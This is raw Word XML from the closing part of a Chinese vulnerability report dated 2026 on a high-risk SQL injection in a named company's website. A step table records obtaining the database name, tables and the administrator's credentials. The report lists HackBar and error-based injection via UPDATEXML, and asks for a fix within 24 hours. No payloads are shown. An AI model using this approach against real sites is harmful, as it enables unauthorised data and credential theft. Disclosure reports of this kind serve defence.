          <w:p w14:paraId="41C37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完成</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="47531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28F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2026-03-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62A7D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获取数据库名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BE81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完成</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5F5A2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A3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2026-03-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57339B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获取表名和字段名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61053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完成</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="06F1F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B5DE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2026-03-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5C5AA6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获取管理员账号密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="154E2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完成</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7C428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F54B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2026-03-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E8B3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生成漏洞报告</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C81F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完成</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1053B4EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>8. 测试工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1CC0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浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>：Chrome/Edge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066EA5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抓包工具</w:t>
      </w:r>
      <w:r>
        <w:t>：HackBar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1614F9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测试方法</w:t>
      </w:r>
      <w:r>
        <w:t>：手工测试 + 报错注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A64943D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>9. 参考链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4725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"https://owasp.org/www-community/attacks/SQL_Injection" \t "_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:t>OWASP SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="503D24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"https://dev.mysql.com/doc/refman/8.0/en/xml-functions.html" \l "function_updatexml" \t "_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:t>MySQL UPDATEXML 函数</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="238022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"https://github.com/flea-php/flea" \t "_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
        </w:rPr>
        <w:t>FLEA 框架文档</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CF5CE2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>10. 结论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CED043">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>本报告确认了大连（林）精密铸造有限公司网站存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>高危 SQL 注入漏洞</w:t>
      </w:r>
      <w:r>
        <w:t>，攻击者可以通过该漏洞获取数据库信息和管理员账号密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415960B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修复优先级</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>高</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>建议修复时间</w:t>
      </w:r>
      <w:r>
        <w:t>：24 小时内</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
        </w:rPr>
        <w:t>复测建议</w:t>
      </w:r>
      <w:r>
        <w:t>：修复后 7 天内进行复测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C34A78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A2C34A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3D86401"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3D86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24C3879"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E24C38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C3D740B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C3D7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F7008A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F7008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75E4F"/>
    <w:rsid w:val="1C4921B3"/>
    <w:rsid w:val="23605F14"/>
    <w:rsid w:val="4FC12C7F"/>
    <w:rsid w:val="7A87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2026-04-02T10:09:33Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>诸星良辰</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-02T10:15:23Z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eyJoZGlkIjoiYTA4ODlhNTEwMGUyZWM2MzIzYTYzYzk1NGMzYzcyNGYiLCJ1c2VySWQiOiIyNTMyNjc3MDIifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>9D4AACF035ED41C8A5E739D5646A1ED8_12</vt:lpwstr>
  </property>
</Properties>
</file>